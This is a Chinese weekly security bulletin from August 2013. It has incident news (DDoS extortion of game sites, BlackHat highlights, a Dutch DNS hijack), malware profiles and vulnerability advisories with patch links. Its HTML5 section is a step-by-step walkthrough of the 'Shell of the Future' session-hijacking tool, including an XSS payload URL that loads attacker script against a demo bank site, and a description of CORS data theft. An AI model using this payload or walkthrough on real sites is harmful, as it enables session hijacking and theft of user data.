当前位置: 安全纵横 > 安全公告

一周安全动态(2013年8月08日-2013年8月15日)

来源:安恒信息 日期:2013-08

2013年8月第三周(8.08-8.15)

本周预警状态为二级:有一些严重漏洞发布或网络攻击时间有增多迹象。需对网络和主机进行必要的监控和升级。

 

 

 

1.安全新闻

1.1 网络犯罪工具攻克汇丰银行的反木马技术

多家网游公司遭到黑客攻击

2013年5月28日,南京警方接到某网络科技公司报警,这家公司主营网络游戏,其游戏网站被黑客攻击了。不仅如此,黑客还很嚣张,主动通过QQ找到他们,要求他们交“保护费”。

据该公司工作人员介绍,28日上午9点半,公司网络突然被攻击,致使网络瘫痪。10点15分左右,一个陌生QQ号码与公司客服人员联系,对方直接表明身份,称公司的网络攻击是由他发起的,要求公司给他支付保护费8000元,如果不付钱就继续攻击。

为了尽量减少损失,公司只好先稳住对方,跟对方讨价还价,最终谈定支付2000元保护费。当天下午3点50分左右,公司向对方提供的账户转入2000元。

据该公司工作人员介绍,黑客实施的是大流量攻击,就是通过网络向公司服务器IP短时间内发送大流量访问,导致公司服务器瘫痪,网络堵塞,用户无法正常访问。 时间从28日上午9点40分至10点20分。致使公司网络游戏的IP地址被租赁公司停用两天,因为机房不停用会导致整个机房瘫痪,造成公司间接经济损失达 10万余元。

就在该公司报警后,警方又陆续接到了多家网络公司的报警,称自己被黑客攻击,并被索要“保护费”。警方迅速出击,将这一“网上黑社会”组织消灭在初始状态。

学习黑客技术,为了实施敲诈

经查,案件中的“黑客”,其实是三个年纪轻轻的小伙子。

黄某,19岁,重庆开县人;胡某,16岁,江西永修县人;二人与徐某是在QQ“DDOS攻击”群里认识,相互交流学习“黑客技术”。

据黄某交代,2013年3月,徐某突然提议说,可以对网上的棋牌游戏公司的服务器实施DDOS攻击,然后再和对方联系要钱。闻言,他和胡某都同意了,但二人 并没有实施攻击的技术,不知如何下手。这时,徐某称自己之前攻击过,也搞到过钱。于是,三人商量后决定:实施网络敲诈勒索,由徐某主要以网络棋牌网站为主 寻找攻击目标和谈价,胡某负责获取流量,黄某负责攻击目标网站。

主意拿定后,三人便开始行动。由于三人中只有胡某手上有流量,他们便使 用胡某的流量来攻击网站。徐某则负责在网上寻找可以攻击的游戏网站及该网站的服务器IP地址,然后,黄某和胡某轮流对徐某找出的IP地址实施流量攻击。攻 击成功后,三个人随便哪个出头,跟被攻击者的客服联系,主动和对方的负责人在QQ中谈价钱。

远程植入木马,攻击他人网站

据黄某交代,他们先在网上使用扫描器扫出对方的8080后台,然后通过后台密码进入对方电脑,在对方电脑中植入木马,从而控制对方电脑;还有一种方法是扫描 器扫描出对方LINUCX(俗称22端口)的ROOT账号密码,通过账号密码进入对方服务器中植入木马,控制对方电脑。一旦控制了对方电脑之后,就能获取 流量,他们通过控制大量的用户电脑和服务器获得累积流量。

对于如何挑选被攻击对象,黄某交代,他们先是在百度里面搜索棋牌的关键词,然后挑选攻击的网络公司,先是下载公司的客户端,抓取公司的服务器IP,然后使用攻击软件对该IP实施流量攻击(DDOS攻击),把该服务器打瘫痪后,再和对方公司联系要钱。

“一般情况下,对方都会给钱,否则他们的网站就打开不了。我们会在网上客服找到对方的QQ,直接通过QQ和对方联系,要求对方给钱,否则就继续攻击他。”黄某说,只要他们开口要钱,对方多少都会给些,否则对方的网络就会瘫痪,网站就打不开,这样一来,损失就更大了。

QQ主动出击,索要“保护费”

黄某等人很是嚣张,他们在QQ上开口要钱时,会以收取“维护费”的方式来要,用他们的话来说,就是让对方交点“保护费”。但是,他们开的价格比较高,最高的时候开价8000元,也有6000元的,但对方都会砍价,一般情况下是在2000元或者1000元成交。

经查,2013年3月起,黄某等三人通过在国外服务器中加载木马的方式获取大批流量,后控制服务器对选中的网站进行“DDOS攻击”,即借助服务器将多个计 算机联合起来作为攻击平台,向目标网站发动DOS攻击,导致被攻击网站因大流量访问而瘫痪,随后再向被害网站提出收取“保护费”的要求。截至今年7月4 日,黄某等人已先后向多家网站实施攻击并敲诈钱财,目前已经查明的犯罪数额达一万余元。

2013年8月10日,利用“黑客”技术网上收“保护费”敲诈勒索网站的黄某、胡某,因涉嫌敲诈勒索罪被玄武区检察院批捕,同案徐某被取保候审。(文中人物系化姓)

2013年5月,不少游戏网站受到黑客攻击,纷纷报警。与以往不同的是,在被攻击后,这些黑客会主动现身,通过网站客服QQ主动联系被攻击者,承认是自己破坏了网站。他们并不是在炫耀自己的能力,而是通过攻击手段在网络上收取“保护费”。

日前,这三个心怀不轨的年轻“黑客”已被警方抓获,其中两人被玄武检方批捕。

1.2 精华解读:从BlackHat2013中我们收获了什么

拉斯维加斯-BlackHat全球黑客大会是每年围观革新安全技术的最好机会,还能和那些在这个行业里聪明至极的家伙交谈并从中得到些关于前沿技术的动向和启示。今年的会议无论参会人数还是议题数量是历届规模最大的,有很多可听和看之处。包括11个跟踪研究在内的关键议题以及新闻发布会从早晨一直延续到晚上,即使再精力充沛的人,想一个不落的都去围观也几乎是不可能的。

但是,我们看到了一些有意思的家伙和一些牛逼的议题,因此我们将使用最通俗的语言来总结会议当中那些最引人注目的,最重要也最有趣的议题和片段。想要一个关于黑帽大会上那些好玩的玩意儿全面综合的报告几乎是不可能的,所以就把这篇文章看成是一个有特色的小吃菜单好了。好好享受噢!

Web已经彻底的烂掉了。

这么说也许有些夸张,但其实是真的。在BlackHat大会上有一定数量的议题展示了对当前Web下层基础机制的全新的影响严重的攻击方式,而且目前基本没有任何简单有效的防御措施。BREACH Attack,是去年CRIME TLS攻击的扩展,能够让攻击者在特定的情况下读取加密之后的信息。

从某种程度上可以说SSL安全模型已经被攻破了,该协议当前正保护着互联网中大多数的Web通信。过去类似的攻击手法都有着各种各样的限制,而现在这种可以说是目前为止最可行也最易于实施的。

用US-CERT的话说:“对此问题我们当前还没有一个可行的解决方案。”无独有偶。在Paul Stone的演讲中,他发现了一种新的技术JavaScript-based timing attacks能够让受害者的浏览器泄露任何一个页面的源代码,这些页面可能会泄露用户ID或其他敏感信息。这种技术还能让他有能力重建目标网站中任何一个iframe中的内容。像一个Web安全研究员说的那样:“太疯狂了,没有方法能修复这个问题。”

你的私家车只不过是一台待宰的羔羊,和PC机无异。

而在某些情况下,它已经被黑了。安全研究院Charlie Miller和Chris Valasek花费了数月时间来想办法入侵机动车的“大脑”电子控制单元(ECU)。最终他们找到了一种方式能够接管ECU并对其重新变成使之能够让攻击者为所欲为。

Miller和Valasek能够让刹车失效,控制方向盘并让其转向任何的方向,其中使用了Toyota Prius和Ford Escape进行了示范。上面说的只是Miller和Valasek发现的众多汽车漏洞中的一个。

“汽车在印象中是很安全的,但有保障才会有安全。如果一个攻击者能够发送CAN数据包,这可能会影响到机动车的安全”,他们在DEFCON 21的演讲Paper中说道。

黑客不喜欢联邦政府的人。

这似乎是不言而喻的,但是近几年一些安全社区或者其中一些板块已经开始友善的对待那些联邦政府特工,政府调查员。联邦政府已经参与BlackHat和DEFCON很多年了,也许这要得益于它们的创始人Jeff Moss,Jeff目前正在多个项目上和政府紧密合作。

但这种相对和谐的气氛随着斯诺登事件一去不复返,所以当美国国家安全局的司令Keith Alexander在七月31号进行opening keynote的演讲时,面前礼貌安静的观众很快开始气愤并与之敌对了起来。

Alexander向大家展示他们所做的隐私搜集数据计划是合法且有效的,但有些参会者对此并不感冒,开始激烈的诘问他。Alexander依然讲满了全场,没有被扔鸡蛋,但也许这将是我们近期内最后一次看到政府官方人员出现在BlackHat的会场了。
移动设备没有安全可言。

研究人员们已经折腾各种手机平台很多年了,并得到了不少成果。Android是一个炙手可热的目标,但其他平台也在慢慢得到研究人员们的重视。Ralf-Phillip Weinmann对黑莓10的安全模型进行了一次彻底的分析测试,并发现了一些有意思的特性,这个系统并没有想象中的那么安全。

他对黑莓这种工作和个人使用独立的安全特性不感冒并说攻击者很容易找到方法黑掉黑莓。与此同时,Karsten Nohl深入到硬件内部,并展示了入侵SIM卡的方法,这个手机里的微型电脑是它的大脑和感知器官。

他发现了一种方法能够发送命令给SIM卡并获得root权限,从而能够完全控制目标手机设备。

以上描述的这些可能会让人感到有些压抑,不过好的方面是像BlackHat以及其他类似的安全会议已经引起了各大制造商和供应商的重视,并开始关注那些演讲的内容并完善自身的产品。相比于通过法律渠道去恐吓那些研究人员,现在作为听众身份去学习并完善自身的方式似乎更有利于去推动他们的安全模式。这就是进步。

1.3 荷兰域名服务器失守:成千网站现恶意软件

成千的荷兰网站出现恶意软件,最初认为是SIDN的域名服务器(DNS)被人破解利用。SIDN和荷兰域名扩展.nl的管理机构。
有报告指荷兰一家大型在线电子零售商Conrad.nl的网站出现恶意软件,网站随即下线。似乎是个孤立的个案,但是马上发现原来是个大得多的问题。

据报道,黑客于星期一早上成功进入SIDN的DRS(域名登记系统),有效地把SIDN 的DRS流量导向一个外部域名服务器。安全公司对事件研究过,这次的侵入影响到数千个域名,毫无戒备的用户访问受影响域名时会被转到一个“正在修建中”的网页上,网页则同时会通过一个iframe送出恶意软件。恶意软件是一个黑洞(Black Hole)攻击套件,会通过Java和PDF的漏洞给自己取得电脑访问权。一旦下载后,它还会下载别的恶意软件,进而通过Tor与C&C服务器通话。

尽管改向较为迅速地被发现,问题的连锁反应却持续了相当长一段时间,原因是域名服务器给出的DNS时间是24小时,也就是说,一旦设好后,许多互联网服务提供商(ISP)会在24小时内继续使用有错误的DNS域。

在这期间,SIDN发布了一个声明,指有好几个新闻报道带有误导成分:“星期天早上,一个特别的增强型注册的DRS户头(Digitalus)对DNS做了改动。此增强型注册的域名服务器的内容被虚假的内容替代。因此,欲访问此增强型注册网页的客户被改向访问别的地方。SIDN的DRS并未受到干扰,否则增强型注册都会出现潜在的大问题,会影响到这些增强型注册的客户和其他市场玩家。我们希望强调的是,SIDN并无受到危害。”

这次事件是SIDN两个月内面临的第二次安全问题。上个月,黑客用SQL注入攻击的办法成功破解了域名管理员的系统,然后把一些恶意软件置入他们的服务器里。不过,管理员强调说,上次的黑客攻击是与目前的问题是不相关的,而且用来重新设置路由的DRS户头登录也不是上一次得到的。其间,荷兰国家电脑安全中心正在调查此次事件。

1.4 德国25万网络信息被盗,遭黑客入侵严重

德国联邦信息技术安全局称,目前该国互联网信息遭黑客入侵的现象十分严重,3个月之间,用户被盗取的身份等信息达25万之多,受害者通常在很久之后才会发现信息被盗。

联邦信息技术安全局负责监督政府网络以及IT业产品认证安全。该机构表示,信息被盗的范围不仅涉及网上银行,还涉及到网络商品交易以及社交网信息等各方面。罪犯盗取用户信用卡或者是社交网中提供的信息,并利用受害人帐户从事商业活动。

该机构提供的数字显示,50%的受害人平均在300天之后,才会发现自己的电脑遭到入侵,因此对普通用户以及企业造成很大危害。另外,黑客对政府以及企业的网络攻击频率也在增强。仅政府网络每天遭到的黑客攻击量达2000到3000次。安全性能极高的政府网络尚且不足以应付为数众多的黑客入侵,可想而知普通电脑的防护功能。

为使企业加强自我保护,联邦信息技术安全局列出了60个网络防范虚弱部分,并且经常刷新列表。但大部分企业不能做到百分百消除障碍。一项来自经济界的调查显示,在过去两年中,25%的德国企业遭到网络入侵,经济损失总和达430亿欧元,平均每个案例损失百万以上。

该机构警告,黑客的首要目标是企业外部服务器及电邮服务器,以及U盘、智能手机及平板电脑这样的移动通讯设备。许多企业负责人喜欢将信息通过上述仪器带在身边,成为最大的安全隐患。

1.5 政府网站频遭病毒木马,信息安全监管亟待加强

伴随着病毒、木马的持续递增及黑客攻击活动的频繁出现,网络环境面临的安全风险不断增大,关于信息安全事件的报道也不断地见诸于报端,影响范围涉及政府、金融、电信等众多领域。

政府网站已成为易受攻击的网站之一,不仅引发泄密风险,也影响政府部门的形象。调查中发现,该现象的主要原因在于违法分子利用网站安全漏洞窃取涉密信息、篡改网站内容获取经济利益等。政府必须加强对政府网络安全的重视程度,提升风险防范能力。

政府网站频频遭遇黑客攻击,网络安全已经事关国家安全、社会发展和网民利益,网络信息安全不容忽视,若想从根本上杜绝上述种种非法行为,加强网站自身的安全防护措施是关键。政府网站应尽快构建安全的服务器环境来抵御“黑客”攻击。就政府网站而言,主要是在技术层面采用软硬件防火墙、杀毒软件、页面防篡改系统来建立一个结构上较完善的Web服务器环境;其次在服务方面,进行网络拓扑分析、建立中心机房管理制度、建立操作系统以及防病毒软件定期升级机制、对重要服务器的访问日志进行备份,通过这些服务,增强网络的抗干扰性;最后在支持方面,要求服务商提供故障排除服务,以提高网络的可靠性。

另外,要提高政府网站安全性,降低黑客攻击风险,网站管理员就应及时给自己的网站程序打上最新的补丁,在开发的时候应加强安全意识,注意防止注入漏洞、上传漏洞等问题,以确保网站运行环境的安全。

1.6 信用卡频频盗刷凸现技术漏洞

如今,刷信用卡消费已经被越来越多的人所接受。但是,随着办卡用户的无序增长,信用卡纠纷也呈现井喷的趋势。去年发布的《个人消费贷款》白皮书显示,信用卡纠纷案的年均增长率高达100%以上。而其中,盗刷套现已经成为了信用卡消费最大的风险。

造成信用卡安全隐患的技术漏洞主要来自于磁条卡本身。目前,国内信用卡普遍使用磁条技术,利用磁条记录客户信息,用户只要在POS机或ATM机上刷卡,就会在机器上留下该银行卡的磁条信息。由于磁条信息有固定的格式,可以按照格式复制出磁条信息。在同一批卡中知道了其中一张卡的磁条信息,就能推算出其他同批次卡的基本资料。

而诈骗人员常用的作案方式是用磁卡数据采集器获得银行卡磁条上的全部信息。他们将该装置安装在自助银行的门禁处,或者在ATM机插卡口处,欺骗性很强。近年来,信用卡盗刷有从ATM机向POS机转移的趋势,只需要收银员在刷卡操作时即可完成信息盗取。这样一来,克隆一张信用卡就轻而易举了。

东南亚地区一直是信用卡盗刷现象最严重的地区之一,盗刷信用卡早已有了一条完整的产业链。在马来西亚,曾经有一家银行因为信用卡盗刷太猖獗而倒闭。目前,马来西亚所有的信用卡都已经从磁条卡升级到芯片卡。欧洲也已完成芯片卡替代磁条卡的工作。

推广芯片卡一直被认为是可以杜绝盗刷最有效的办法。芯片可以存储密匙、数字证书、指纹等信息,卡上有数据加密保护,并且在使用保护上采取个人密码、卡与读写器双向认证。芯片卡复制的难度极高,具备很强的抗攻击能力。但是,芯片卡也并非万无一失,芯片中有一个数据段包含了最关键的信息,但它是不变的。一般情况下,这个数据段只有银行专用软件可以看到,一旦这类软件被犯罪者得到,持卡人刷过后,就 可以得到该数据信息。当然,这种作案手法目前还存在很大的难度。

事实上,换了芯片卡后仍然没有办法制止网络购物中的刷卡风险。目前,在全世界范围内,网购用户面临的支付安全问题中,因“账户密码被盗”和“遭遇木马钓鱼”造成的资金损失占百分比分别达33.9%和24%,这正是信用卡网络安全隐患的根源。

其实,网络支付安全主要取决于服务提供商对数据加密的技术。目前,在信用卡网络支付中,U盾被业内人士认为是目前最安全的手法。第三方支付平台也推出了诸如手机动态密码支付制度等安全手段,使得交易要通过手机移动验证才能完成。

1.7 揭密HTML 5带来的攻击手法

HTML5 是下一代的HTML,HTML5赋予网页更好的意义和结构。更加丰富的标签将随着对RDFa的,微数据与微格式等方面的支持,构建对程序、对用户都更有价值的数据驱动的Web。基于HTML5开发的网页APP拥有更短的启动时间,更快的联网速度。本文详细介绍了HTML5的普及,带来的新的安全威胁。

一、CORS(Cross-Origin Resource Sharing) 跨域资源共享

为了构建高品质的网站,以及满足日益增长的用户需求,HTML5针对SOP(同源策略)放宽了一些限制,简单的说,同源策略允许来自同一站点的页面访问其页面的方法和属性等,但限制了跨域调用其他页面的方法和属性。现在HTML5放宽了这些限制,XMLHttpRequest Level 2新增了功能CORS协议,允许Ajax发起跨域的请求,浏览器是可以发起跨域请求的,比如你可以外链一个外域的图片或者脚本。但是Javascript脚本是不能获取这些资源的内容的,它只能被浏览器执行或渲染。

COR是页面层次的控制模式。每一个页面需要返回一个名为‘Access-Control-Allow-Origin’的HTTP头来允许外域的站点访问。你可以仅仅暴露有限的资源和有限的外域站点访问。在COR模式中,访问控制的职责可以放到页面开发者的手中,而不是服务器管理员。当然页面开发者需要写专门的处理代码来允许被外域访问。

所以只要b.com允许,a.com可以使用ajax获取A上任意数据,国外安全研究者Lava Kumar开发了一款工具“Shell of the future”。

Shell of the Future 是一个反向Web Shell处理工具(Reverse Web Shell handler)。利用跨站脚本攻击或浏览器地址栏注入javascript以后,Shell of the Future可进行劫持会话。 它利用了HTML5支持的Cross Origin Requests,可以绕过一些反会话劫持的方法,如HTTP-Only限制的cookie,帮定IP地址的会话ID。

如何使用该工具:

1、下载并解压该工具,双击“Shell of the Future.exe”,会弹出一个窗口。

2、输入任意端口,点击“Start”。

3、使用浏览器访问http://127.0.0.1:8008/sotf.console (firefox效果最佳)

4、不出问题,你将看到以下画面。(Shell of the Future有两个JavaScript的exp- e1.js和e2.js,我们可以利用XSS漏洞将其嵌入到受害者的浏览器)

5、当一个用户登录下面的测试网站:

http://www.testfire.net/bank/login.aspx (admin/admin)

该站点的搜索功能粗在一个XSS漏洞

http://www.testfire.net/search.aspx?txtSearch=%3Cscript%3Ealert%2812%29%3C%2Fscript%3E

6、攻击者发送一个恶意链接给用户,如下:

http://www.testfire.net/search.aspx?txtSearch=%3Cscript%20src=%22http://127.0.0.1:8008/e1.js%22%3E%3C/script%3E

7、当用户点击之后,攻击者的IP地址将会发送给攻击者,然后点击“Hijack Session”:

8、点击Hijack Session之后,将出现如下画面:

三、访问内部服务器:

很多互联网公司除了有ONLINE对外的业务之外,在内部也用着很多的应用,如财务管理系统、员工管理系统以及其他的一些内部社区等,很多开发者为了各个应用之间调用简洁方便,在很多应用中都添加了以下头:

Control-Allow-Origin: *

攻击者可以利用社会工程学,让内部用户点击一个链接,然后攻击者就可以访问到内部的一些资源,以下为操作步骤:

1、员工登录到内部的某应用,如www.internalurl.com

2、internalurl服务器返回的响应头设置了Access-Control-Allow-Origin: *(允许任何域发起的请求都可以获取当前服务器的数据。)

3、员工受到一封邮件,点击了链接 – www.malicioussite.com

4、这个站点包含了正常的UI内容,所以员工一般不会察觉,但是,该页面包含了一段javascript代码。

5、该javascript代码会发送一个XMLHttpRequest请求。

6、分析返回的数据包,并把它发送到攻击者的服务器。

7、攻击者获取到公司内部站点的相关信息。

 

2 本周关注病毒

2.1 Trojan.Agent.gcj(木马病毒)

警惕程度 ★★

该病毒通过U盘,局域网,DLL劫持多种常用软件,感染压缩包格式的文件等手段传播;并利用不同手段关闭不同的杀毒软件。病毒具有一个生成器,可以随意定制下载地址和功能。

2.2 Worm.Win32.TaopuLS.b(蠕虫病毒)

警惕程度 ★★

病毒运行后,将修改注册表,并后台连接黑客指定网址,不断为该页面刷流量,占用用户的电脑资源及网络资源。同时,病毒还将隐藏电脑中所有PDF,XLS,PPT类型文件,并篡改用户的DOC文档。中毒电脑将感染所有接入电脑的U盘和网络中的其他电脑,并向黑客指定网址发送大量垃圾数据。届时用户将出现网路拥堵、电脑运行缓慢等问题,同时,电脑中存储的文件也将面临丢失的风险。

2.3 Trojan.Win32.Generic.158259C0(‘文档粉碎机’木马病毒)

警惕程度 ★★★★

病毒运行后,将修改注册表,实现开机自启动。同时病毒还将删除注册表中“安全模式”相关项,使系统无法进入安全模式。并强制关闭杀毒软件进程,搜索电脑硬盘中的jpg、exe、mp4、html、bmp、doc、ppt、xml、gif、txt等文档,予以删除。电脑一旦中毒,用户将面临大量工作文档、商业机密丢失的风险。

 

3 安全漏洞公告

3.1 ISC BIND 9 SRTT算法授权服务器选择安全漏洞

ISC BIND 9 SRTT算法授权服务器选择安全漏洞

发布时间:

2013-08-13

漏洞编号:

BUGTRAQ ID: 61774

漏洞描述:

BIND是一个应用非常广泛的DNS协议的实现。
ISC BIND 9内的SRTT算法实现中存在漏洞,理论上此漏洞可使攻击者手动降低递归服务器与授权服务器相关联的SRTT值,从而影响特定授权服务器从NS资源记录集值内确定要查询的域服务器。SRTT选择不仅影响授权服务器,也影响递归或授权混合服务器。攻击者可利用此漏洞执行DNS相关的攻击,例如DNS缓存投毒。

安全建议:

目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.isc.org/software/bind/advisories/

3.2 Microsoft Windows 远程权限提升漏洞

Microsoft Windows 远程权限提升漏洞

发布时间:

2013-08-13

漏洞编号:

BUGTRAQ ID: 61673
CVE(CAN) ID: CVE-2013-3175

漏洞描述:

Windows是一款由美国微软公司开发的窗口化操作系统。
Windows处理发给共享主机的畸形异步RPC请求时存在权限提升漏洞。成功利用此漏洞可执行任意代码并完全控制受影响系统。

安全建议:

Microsoft已经为此发布了一个安全公告(MS13-062)以及相应补丁:
MS13-062:Vulnerability in Remote Procedure Call Could Allow Elevation of Privilege (2849470)
链接:
http://technet.microsoft.com/security/bulletin/MS13-062

3.3 ZZN SQL注入/XSS/凭证泄露漏洞

ZZN SQL注入/XSS/凭证泄露漏洞

发布时间:

2013-08-09

漏洞编号:

CVE(CAN) ID: CVE-2007-0177

漏洞描述:

ZZN是虚拟主机电子邮件服务。
ZZN在实现上存在多个XSS、远程盲SQL注入、凭证泄露漏洞,这些漏洞可导致远程攻击者执行未授权数据库操作等。

安全建议:

目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.zzn.com

3.4 Cacti SQL及命令注入漏洞

Cacti SQL及命令注入漏洞

发布时间:

2013-08-06

漏洞编号:

 

漏洞描述:

Cacti是一款轮循数据库(RRD)工具,可帮助从数据库信息创建图形,有多个Linux版本。
Cacti 0.8.8b对某些输入没有正确过滤即用在SQL查询和执行命令,可导致注入和执行任意SQL代码和shell命令。

安全建议:

目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:http://www.cacti.net/download_cacti.php

3.5 Microsoft Exchange Server Outside In Technology 多个漏洞

Microsoft Exchange Server Outside In Technology 多个漏洞

发布时间:

2013-08-03

漏洞编号:

CVE(CAN) ID:
CVE-2013-2393,CVE-2013-3776,CVE-2013-3781

漏洞描述:

Microsoft Exchange Server是微软公司的一套电子邮件服务组件。
Exchange Server 2007, Exchange Server 2010, Exchange Server 2013的WebReady Document Viewing功能存在漏洞CVE-2013-2093和CVE-2013-3776。如果用户通过浏览器的Outlook Web Access查看特制文件,这些漏洞可允许攻击者以LocalService账户执行远程代码。Exchange Server 2013的Data Loss Protection (DLP)功能存在漏洞CVE-2013-3781,如果用户在浏览器中通过Outlook Web Access查看特制文件,此漏洞可造成受影响服务器拒绝服务。

安全建议:

Microsoft已经为此发布了一个安全公告(MS13-061)以及相应补丁:
MS13-061:Vulnerabilities in Microsoft Exchange Server Could Allow Remote Code Execution (2876063)
链接:
http://technet.microsoft.com/security/bulletin/MS13-061